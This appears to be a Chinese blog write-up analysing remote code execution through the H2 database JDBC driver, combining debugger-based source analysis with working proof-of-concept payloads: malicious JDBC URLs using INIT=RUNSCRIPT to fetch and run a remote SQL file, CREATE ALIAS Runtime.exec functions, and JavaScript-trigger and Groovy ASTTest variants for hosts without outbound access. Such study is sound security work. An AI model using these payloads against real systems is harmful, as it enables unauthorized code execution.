<!doctype html>
<html lang="zh-CN" data-theme="light">
<head>
  <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="theme-color" content="#173f32">
<meta name="description" content="卷毛肖恩的个人博客">
<title>H2-JDBC-Attack · CurlySean&#39;s Blog</title>
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">
<link rel="stylesheet" href="/fontawesome/solid.min.css">
<link rel="stylesheet" href="/fontawesome/brands.min.css">
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.3.0"></head>
<body class="page-post">
  <a class="skip-link" href="#main">跳到正文</a>
  <header class="site-header">
  <div class="shell header-inner">
    <a class="brand" href="/" aria-label="返回首页">
      <span class="brand-mark" aria-hidden="true"><img src="/images/curly-sean-avatar.png" alt=""></span>
      <span>卷毛肖恩<small>PERSONAL BLOG</small></span>
    </a>
    <button class="nav-toggle" type="button" aria-label="打开导航" aria-expanded="false"><i class="fa-solid fa-bars"></i></button>
    <nav class="site-nav" aria-label="主导航">
      
        <a href="/">首页</a>
      
        <a href="/archives/">归档</a>
      
        <a href="/categories/">分类</a>
      
        <a href="/tags/">标签</a>
      
        <a href="/about/">关于</a>
      
    </nav>
    <div class="header-actions">
      <button class="icon-button search-open" type="button" aria-label="搜索"><i class="fa-solid fa-magnifying-glass"></i></button>
      <button class="icon-button theme-toggle" type="button" aria-label="切换深色模式"><i class="fa-solid fa-moon"></i></button>
    </div>
  </div>
</header>

  
  <main id="main" class="site-main shell">
    <div class="post-layout">
  <article class="article-shell">
    <header class="article-header">
      <div class="post-meta"><time>2025.08.15</time><span>Java</span><span>约 9 分钟阅读</span></div>
      <h1>H2-JDBC-Attack</h1>
      <div class="post-tags"><a href="/tags/JDBC/">#JDBC</a></div>
    </header>
    <div class="article-content"><h1 id="pdg3I">H2-JDBC-Attack</h1>
<h2 id="BMzNu">前言</h2>

<p>最近看了看了一些数据库驱动，想起来经常利用的H2数据库的驱动，但是还没分析过源码，所以今天来浅析一下</p>
<h2 id="IB5SS">漏洞介绍</h2>

<p>H2数据库是一款用Java编写的轻量级开源关系型数据库，支持嵌入式和服务器模式。它以其高性能、便捷性和灵活性，广泛应用于开发和测试环境。 h2数据库是纯Java的，因此跨平台使用更加方便。  </p>
<p>在使用 H2 数据库进行 JDBC 连接时，攻击者可以在执行初始化SQL语句时，控制执行 Java 代码，从而导致了代码执行漏洞。</p>
<h2 id="qHwg3">前置基础</h2>
<h3 id="KfZyI">环境搭建</h3>

<p>从官网<a target="_blank" rel="noopener" href="https://www.h2database.com/html/cheatSheet.html">https://www.h2database.com/html/cheatSheet.html</a>下载h2的jar包，使用如下命令启动WebConsole服务，默认监听8082端口。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -cp h2-1.4.200.jar org.h2.tools.Server -web -webAllowOthers -ifNotExists</span><br></pre></td></tr></table></figure>

<p>启动后访问，会出现一个连接的页面</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755241013648-89ec32f8-3a92-44d8-8392-0be10a98d354.png"></p>
<h3 id="sJWCh">h2数据库任意命令执行</h3>

<p>在H2数据库中，有以下两个命令，支持用户自定义函数：</p>
<ul>
<li>CREATE ALIAS</li>
<li>CREATE TRIGGER</li>
</ul>
<p>以ALIAS为例，我们可以创建一个shell函数，并且调用它</p>
<p><code>$$</code>符号可以表示无需转义的字符串</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">CREATE</span> ALIAS shell <span class="keyword">AS</span> $$void shell(String s) throws Exception &#123;</span><br><span class="line">java.lang.Runtime.getRuntime().<span class="keyword">exec</span>(s);</span><br><span class="line">&#125;$$;</span><br><span class="line"><span class="keyword">SELECT</span> shell(<span class="string">&#x27;cmd /c calc.exe&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>执行后成功弹出计算机</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755241709163-58306976-dcb0-42f5-a3a4-b860e2040492.png"></p>
<h2 id="b0Yf9">代码分析</h2>
<h3 id="OuhrW">环境搭建</h3>

<p>首先创建一个Java项目，导入H2JDBC的依赖，这里我使用的是<code>1.4.199</code>版本</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>com.h2database<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>h2<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">version</span>&gt;</span>1.4.199<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后创建漏洞触发代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">h2Connect</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        Class.forName(<span class="string">&quot;org.h2.Driver&quot;</span>);</span><br><span class="line">        <span class="type">String</span> <span class="variable">simplexp</span> <span class="operator">=</span> <span class="string">&quot;jdbc:h2:mem:test&quot;</span>;</span><br><span class="line">        java.sql.<span class="type">Connection</span> <span class="variable">conn</span> <span class="operator">=</span> DriverManager.getConnection(simplexp);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="X1sln">代码分析</h3>
我们直接下断点到H2驱动的`connect`方法处，前面先判断URL格式是否符合h2数据库连接的格式，然后调用`JdbcConnection`的构造函数进行创建数据库连接

<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755227935438-2d11acd1-6759-4fed-942c-3dd6d5e83b44.png"></p>
<p>跟进<code>JdbcConnection</code>的构造函数，调用了<code>connectEmbeddedOrServer</code>，其他部分做了一些判断和赋值的简单操作</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755228213696-2f1146be-12e2-40c6-a2ac-d6e8161489db.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755228347105-ab9e0993-8197-406e-80b4-57d44c44b510.png"></p>
<p>跟进<code>connectEmbeddedOrServer</code>方法，这里调用了<code>org.h2.engine.Engine.createSession</code>方法</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755228872145-a4fab2b6-4733-4ed0-93ec-53eae1540e3c.png"></p>
<p>跟进<code>createSession</code>，再跟进<code>createSessionAndValidate</code>方法，前面的东西不太需要看，我们只需要跟着传入的参数<code>var1</code>即可</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755229005496-63a86dff-2eb9-4fdb-96cc-5d2ae6a5c9c0.png"></p>
<p>跟进<code>openSession</code>中，会从我们的<code>ConnectionInfo</code>中获取以下四个参数，这里我们可以利用的参数为<code>INIT</code>，因此我们后面跟着var5参数即可</p>
<p>我们在URL中添加INIT参数<code>INIT=RUNSCRIPT FROM &#39;http://127.0.0.1:9999/poc.sql&#39;</code>，继续调试</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755229236249-f50534d7-e446-40d6-8760-83d032518535.png"></p>
<p>在后面会判断var5是否为空若不为空就执行<code>prepareCommand</code>和<code>executeUpdate</code>方法，这两个方法名一看见就有搞的哈哈哈哈</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755229351170-48df3e04-7b1d-4816-8f7b-435582ec9d99.png"></p>
<p>在<code>repareCommand</code>方法中，执行了对字符串的解析操作，然后调用<code>executeUpdate</code>方法，我们跟进查看</p>
<p>解析完SQL字符串后，跟进到<code>Command#executeUpdate</code>方法，调用了<code>this.update</code>来执行SQL语句</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755230793457-9080ae19-06a2-4bc9-a1d7-b62162586c8b.png"></p>
<p>持续跟进<code>update</code>方法，这里首先调用<code>openInput</code>方法，读取我们远程的SQL文件，然后逐行执行SQL语句</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755238775471-777d0fe8-09eb-4c9f-a376-7389609fac2a.png"></p>
<p>在<code>openInput</code>方法中，可以看到读取到了远程的文件名</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755238742298-0d9e4263-aa5b-49de-a8ff-8ed27e3f5ca5.png"></p>
<p>跟进<code>execute</code>方法，这里已经读取到文件内容，并执行SQL语句</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755239078782-ecdce948-d0f3-41d7-92c2-23ef96dcc872.png"></p>
<h2 id="MZutg">漏洞利用</h2>
<h3 id="bpWvg">出网利用方式</h3>

<p>在INIT参数中，只允许执行一条初始化命令，且其中不能包含分号。这时我们可以借助另一个命令<code>RUNSCRIPT</code>，该命令通常用于执行一个SQL文件，例如<code>RUNSCRIPTE FROM &#39;./poc.sql&#39;</code>，在读取文件时，代码中使用了URL类，因此我们可以加载远程SQL文件。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="keyword">public</span> InputStream <span class="title function_">newInputStream</span><span class="params">()</span> <span class="keyword">throws</span> IOException &#123;</span><br><span class="line"><span class="keyword">if</span> (name.matches(<span class="string">&quot;[a-zA-Z]&#123;2,19&#125;:.*&quot;</span>)) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// otherwise a URL is assumed</span></span><br><span class="line">    <span class="type">URL</span> <span class="variable">url</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">URL</span>(name);</span><br><span class="line">    <span class="keyword">return</span> url.openStream();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">FileInputStream</span> <span class="variable">in</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileInputStream</span>(name);</span><br><span class="line">IOUtils.trace(<span class="string">&quot;openFileInputStream&quot;</span>, name, in);</span><br><span class="line"><span class="keyword">return</span> in;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Poc如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">jdbc:h2:mem:test;INIT=RUNSCRIPT FROM <span class="string">&#x27;http://127.0.0.1:9999/poc.sql&#x27;</span></span><br></pre></td></tr></table></figure>

<p>将以下内容写入<code>poc.sql</code>中，并开启HTTP服务</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">CREATE</span> ALIAS <span class="keyword">EXEC</span> <span class="keyword">AS</span> <span class="string">&#x27;String shellexec(String cmd) throws java.io.IOException&#123;Runtime.getRuntime().exec(cmd);return &quot;hacker&quot;;&#125;&#x27;</span>;</span><br><span class="line"><span class="keyword">CALL</span> <span class="keyword">EXEC</span>(<span class="string">&#x27;calc&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755243366363-aef263ca-6501-46eb-a21e-cd230f46a1db.png"></p>
<h3 id="e1MeC">不出网利用方式</h3>

<p>在不出网的情况下，我们就无法利用远程读取SQL文件来执行恶意SQL语句了</p>
<h4 id="fwgEP">无额外依赖情况</h4>

<p>在没有groovy依赖的情况下，我们该怎么进行不出网的利用呢。</p>
<p>可以用于<code>javax.script.ScriptEngineManager</code>创建 <code>org.h2.api.Trigger</code> 对象。 <code>javax.script.ScriptEngineManager</code>是Java中用于执行脚本的引擎，而Java 8原 生自带了JavaScript的脚本引擎。</p>
<p>在<code>TriggerObject#loadFromSource</code>方法中，调用<code>isJavaxScriptSource</code>方法判断是否为javascript脚本。如果以<code>//javascript</code>或<code>#ruby</code>开头，就会被当作javascript脚本</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755245781347-60067bf5-17d0-4760-95c2-481ba424ad32.png"></p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755245907981-a126794e-d33f-4204-97c1-eceeca324804.png"></p>
<p>poc如下（需要注意<code>//script</code>后需要有个换行）</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON</span><br><span class="line">INFORMATION_SCHEMA.TABLES AS $$<span class="comment">//javascript</span></span><br><span class="line">java.lang.Runtime.getRuntime().exec(<span class="string">&#x27;cmd /c calc.exe&#x27;</span>)</span><br><span class="line">$$</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755246220565-2c6e8722-9362-4f6a-98cd-14ef76a12c02.png"></p>
<h4 id="sFnH3">存在Groovy依赖情况</h4>
在之前学习groovy脚本执行时，存在沙箱的情况下，我们可以使用AST注解绕过沙箱的检测，在导入`groovy-sql`依赖时，同样我们可以使用AST注解，进行H2JDBC不出网的利用

<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>org.codehaus.groovy<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>groovy-sql<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">version</span>&gt;</span>3.0.8<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>会根据是否以<code>//groovy</code>或<code>@groovy</code>开头，判断是否以groovy脚本执行</p>
<p><img src="https://cdn.jsdelivr.net/gh/CurlySean/blogImage@main/img/1755246427938-a7078c39-fba9-4b36-a650-7ee97cb36abe.png"></p>
<p>Poc如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS shell2 AS</span><br><span class="line">$$<span class="meta">@groovy</span>.transform.ASTTest(value=&#123;</span><br><span class="line">    <span class="keyword">assert</span> java.lang.Runtime.getRuntime().exec(<span class="string">&quot;cmd.exe /c calc.exe&quot;</span>)</span><br><span class="line">&#125;)</span><br><span class="line">def x$$</span><br></pre></td></tr></table></figure>

<h2 id="BLqDq">小结</h2>
相比于之前学习的postgresql和mysql驱动的攻击，感觉H2 JDBC ATTACK的攻击点是利用了H2的语言特性，存在可以自定义函数的功能，导致了这个漏洞

</div>
    <footer class="article-footer"><p><i class="fa-solid fa-seedling"></i> 本文由 CurlySean 原创记录，转载请注明出处。</p></footer>
    <nav class="post-nav"><a href="/2025/08/15/Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/"><small>上一篇</small>Redis未授权</a><a href="/2025/08/14/%E5%9F%BA%E4%BA%8ESqlServer%E7%9A%84SQL%E6%B3%A8%E5%85%A5/"><small>下一篇</small>基于SqlServer的SQL注入</a></nav>
    


  </article>
  <aside class="toc-panel"><p class="eyebrow">ON THIS PAGE</p><h2>本文目录</h2><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#BMzNu"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IB5SS"><span class="toc-text">漏洞介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#qHwg3"><span class="toc-text">前置基础</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#KfZyI"><span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sJWCh"><span class="toc-text">h2数据库任意命令执行</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#b0Yf9"><span class="toc-text">代码分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#OuhrW"><span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#X1sln"><span class="toc-text">代码分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MZutg"><span class="toc-text">漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#bpWvg"><span class="toc-text">出网利用方式</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#e1MeC"><span class="toc-text">不出网利用方式</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#fwgEP"><span class="toc-text">无额外依赖情况</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sFnH3"><span class="toc-text">存在Groovy依赖情况</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BLqDq"><span class="toc-text">小结</span></a></li></ol></div></aside>
</div>

  </main>
  <footer class="site-footer">
  <div class="shell footer-inner">
    <p>© 2025–2026 卷毛肖恩 · 个人博客</p>
    <div class="social-links">
      <a href="https://github.com/CurlySean" target="_blank" rel="noopener" aria-label="GitHub"><i class="fa-brands fa-github"></i></a>
      <a href="mailto:5345414e@gmail.com" aria-label="邮件"><i class="fa-solid fa-envelope"></i></a>
      <a href="/atom.xml" aria-label="RSS"><i class="fa-solid fa-rss"></i></a>
    </div>
  </div>
</footer>

  <div class="search-panel" role="dialog" aria-modal="true" aria-label="站内搜索" hidden>
  <div class="search-dialog">
    <button class="search-close icon-button" type="button" aria-label="关闭搜索"><i class="fa-solid fa-xmark"></i></button>
    <label for="site-search">搜索文章</label>
    <div class="search-input-wrap"><i class="fa-solid fa-magnifying-glass"></i><input id="site-search" type="search" placeholder="输入标题、标签或正文关键词…" autocomplete="off"></div>
    <p class="search-hint">按 ESC 关闭 · 输入至少 2 个字符</p>
    <div class="search-results" aria-live="polite"></div>
  </div>
</div>

  <button class="back-to-top" type="button" aria-label="回到顶部"><i class="fa-solid fa-arrow-up"></i></button>
  <script src="/js/main.js"></script>
</body>
</html>
